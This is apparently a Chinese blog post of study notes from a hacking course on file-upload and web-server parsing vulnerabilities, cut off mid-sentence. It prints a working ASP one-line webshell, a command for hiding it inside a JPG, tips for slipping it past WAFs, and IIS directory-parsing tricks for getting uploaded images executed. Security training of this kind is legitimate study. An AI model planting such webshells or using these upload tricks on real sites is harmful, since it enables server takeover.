cracer培训第一期 上传漏洞与解析漏洞

本文介绍了黑客利用一句话木马进行攻击的方法,包括ASP和JSP环境下的实现方式,以及如何通过包含和文件头欺骗绕过WAF。同时,文章详细讲解了IIS、Apache和Nginx的解析漏洞,如目录解析、文件解析,以及如何利用这些漏洞。最后,讨论了文件上传漏洞的几种类型,包括文件路径修改和文件类型更改的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

突然感觉有点迷茫…是因为没有实际操作吗??..还是基础不牢固??.继续看视频吧
一句话木马:
黑客在注册信息的电子邮箱或者个人主页中插入类似如下代码:
<%execute request(“value”)%>
其中value是指,所以可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%> 现在比较多见
当知道了数据库的url,就可以利用本地一张网页 进行连接 得到webshell.
(不知道数据库也可以,只要知道<%eval request(“value”)%> 这个文件被插入到哪一个asp文件里面就可以了.)
这就被称为一句话木马,它是基于B/S结构的.
jsp的特殊,需要操作一下
一句话客户端: 中国菜刀,中国砍刀,lanker一句话客户端,zv新型php一句话木马客户端GUI版
一句话木马的制作
C32下做一句话
打开c32,把图片放里面,写入一句话保存…退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性->详细信息->版权内插入一句话即可
使用包含进行突破waf
asp包含文件,不含恶意代码… 把一句话木马写在jpg里包含在asp中这样就可以过waf

上传解析漏洞
解析漏洞主要说的是一些特殊文件被iis、Apache、Nginx在某种情况下解释成脚本文件格式的漏洞
IIS 5.x、6.0解析漏洞
IS6.0解析利用方法有两种
1.目录解析 /xx.asp/xx.jpg
在网站下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行.
例如创建目录cracer.asp,那么/cracer.asp/1.jpg 将被当作asp文件来执行.假设黑客可以控制上传文件夹路径,就可以不管你上传后

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值